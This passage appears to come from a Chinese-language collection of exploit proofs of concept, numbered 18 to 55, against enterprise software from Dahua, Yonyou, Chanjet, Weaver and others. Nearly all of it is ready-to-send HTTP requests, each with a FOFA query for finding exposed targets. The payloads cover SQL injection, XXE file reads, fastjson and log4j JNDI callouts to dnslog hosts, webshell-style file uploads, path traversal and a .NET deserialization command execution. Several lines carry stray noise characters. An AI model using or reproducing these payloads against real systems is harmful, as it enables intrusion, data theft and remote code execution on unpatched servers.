3 Q6 k4 y9 J" i+ \5 U1 J9 B+ }Content-Length: 345
3 f. l) v7 S% S% X& @1 \Accept-Encoding: gzip+ b' p; X1 z5 ]8 s: \
; N; O. L6 z+ T2 ~4 }1 Y
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
" |4 ^1 C2 ^5 _5 U( o1 n9 S, A" t<s11:Body>
& ]7 Q* V0 }# O4 J" M0 ^ <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
) P: e, t: \3 Q X- [4 R <netMarkings>
3 e9 P1 _# n9 v I% m ~9 r& I2 X* O1 C (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
9 h. D8 B0 g8 r3 ^ </netMarkings>0 d; C. A4 M9 P- ^- s* x, X3 g# j/ n0 y: O
</ns1:deleteBulletin>& T- y K! X+ n) ?) k N! R1 j
</s11:Body># S9 {2 L- ~* K& h P# \. q5 ]
</s11:Envelope>$ Z, w# `/ w' w
9 o8 [ N J2 q; `- o$ d3 c0 \4 d+ O, d9 e5 b- A( i
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- l! f8 z4 }# MFOFA:app="dahua-DSS"
1 m9 Q# i7 T7 U/ `% vGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1# ]2 b, `* d D% t8 [
Host: your-ip
$ @4 U3 ^0 n$ k2 Q) |# WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
w3 j' s8 `( P8 WAccept-Encoding: gzip, deflate& U) F+ s# r- L
Accept: */*
( F0 N5 k9 F' oConnection: keep-alive
0 R b4 D# u( g( h# {, X, y: P
3 a% }9 r; @5 I( E
$ j8 ]+ K! V+ R" n+ _
/ n! O0 m5 [9 C: X' F+ }2 i19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入6 a. m H8 b+ w0 w& v/ h# z/ N
FOFA:app="dahua-DSS"
4 }1 M2 o7 |) e CGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
. ? Q3 H5 v' ~( k6 f# YHost:
4 p" y& {& d3 [6 \7 WUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
, U+ B3 j; g5 e$ ?, PAccept-Encoding: gzip, deflate
4 w# E7 |% r/ d4 [7 t9 h: xAccept: */*
1 D. k0 m2 n+ H" ~1 U# SConnection: keep-alive
& ~% f0 n, P! i# @0 L* G8 z
I8 R4 D, d6 x6 G2 l; Q( q! y0 w- J! L/ L, m! X
20. 大华ICC智能物联综合管理平台任意文件读取8 K7 g6 R5 |2 t) ]) N4 r! z% [- s
FOFA:body="*客户端会小于800*"
0 J* s5 I( @" v. a, r! K; sGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
2 u: J2 `* o0 M, `Host: x.x.x.x3 ]* m! P4 T8 a. s) F2 m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.366 Q$ M$ N: l: i% D9 Y5 {
Connection: close# Z8 E* i5 a- i7 ?' C& i. H+ f% Y
Accept: */** I* E! ^8 m5 F0 Z# Z& g
Accept-Language: en( B8 Q; U6 K9 n9 p4 J$ a' q
Accept-Encoding: gzip
; g7 d3 P" U( M: f! i; }* `
- }* [3 }: k, F J+ J
l6 r. ?1 q) S21. 大华ICC智能物联综合管理平台random远程代码执行
S7 U/ O9 J& x2 L/ o6 m3 t! bFOFA:icon_hash="-1935899595"
" ?9 c2 `* Z, @POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 C. n, J y1 I( N; ^. j
Host: x.x.x.x( D; X7 i9 b7 G6 [' Z3 o' [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ u" B ^# Z8 r( p5 r1 fContent-Length: 161
* D) N1 F6 F; c( m% a# ~, XAccept-Encoding: gzip" Y& S& I+ T/ K2 f( V z" a
Connection: close8 X5 d8 e8 Q& ]
Content-Type: application/json;charset=utf-8" K1 h/ w: q" c4 g4 M
' w0 d# G0 r! \, e$ T+ |6 w4 y% S% {{& |+ ^: {) P3 N, N& M( Y
"a":{
f+ M: {0 `- V; [2 z! c' H/ k "@type":"com.alibaba.fastjson.JSONObject",
2 o4 ?9 u4 O1 A; ^9 }( s& v D W) C {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
2 G/ P- X6 o" D; j. K }"". d- d+ ~2 r: s2 R$ R, J$ x7 x9 I: f
}8 ]; B0 Y$ c1 \. L# |% }7 w
- f' O" V) e6 K5 |
3 m* g: ~% f4 ^' t2 v3 B% U22. 大华ICC智能物联综合管理平台 log4j远程代码执行" E% [3 n: |" }- I
FOFA:icon_hash="-1935899595"
, b4 |, l7 ^2 y" b2 v: UPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1- u1 S& f8 ~2 H- F: v8 d) s5 M
Host: your-ip; [& q$ X; x6 i. {& `2 a7 B& V0 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 t) M q, F5 uContent-Type: application/json;charset=utf-8
* F( Q/ n7 U \; x0 q1 s5 M1 m) n M: D' Z
{" |$ @0 P. U4 A- K9 |: V, c
"loginName":"${jndi:ldap://dnslog}"9 J' O ^3 a) Y' f, Q% f2 g- x5 h
}/ ]& ?' w7 }5 v, V; K. D0 t
' I) G! i9 p, L+ |7 X F% x
/ K6 q1 f7 ^% e
% T" T4 {8 [# p23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
8 n# F* o8 Z( M: q* l# R# MFOFA:icon_hash="-1935899595"$ {9 }8 |8 d; ]! I( N
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
8 P7 h; ^& i0 ]$ b7 {. L% p9 y/ wHost: your-ip* G; S) e! F3 p% a4 Y" Q! g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% \1 a5 Q7 z, {* Z; DContent-Type: application/json;charset=utf-80 H6 V: d+ v- |5 T
Accept-Encoding: gzip! v# g& `: M% f# R
Connection: close1 i2 z( V. | h
6 @, ~- d& C4 p7 q* e
{
{( ]$ m! q0 Q4 B$ h1 D "a":{
1 L8 C1 r* h h- U "@type":"com.alibaba.fastjson.JSONObject",
% q: X8 B; m' \% P5 M: V {"@type":"java.net.URL","val":"http://DNSLOG"}( v. ^, j' _7 v p9 ~+ F# S' m
}""3 T0 N8 U3 [) t" b8 E
}
* E( o6 _- K! U* S
$ M6 H( X* E8 U6 d
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp
29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
  <soapenv:Header/>
  <soapenv:Body>
    <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
    </ser:getUserNameById>
  </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

12316
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 Social Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it runs a command that writes the given string into the given file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
            }
        }
    }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
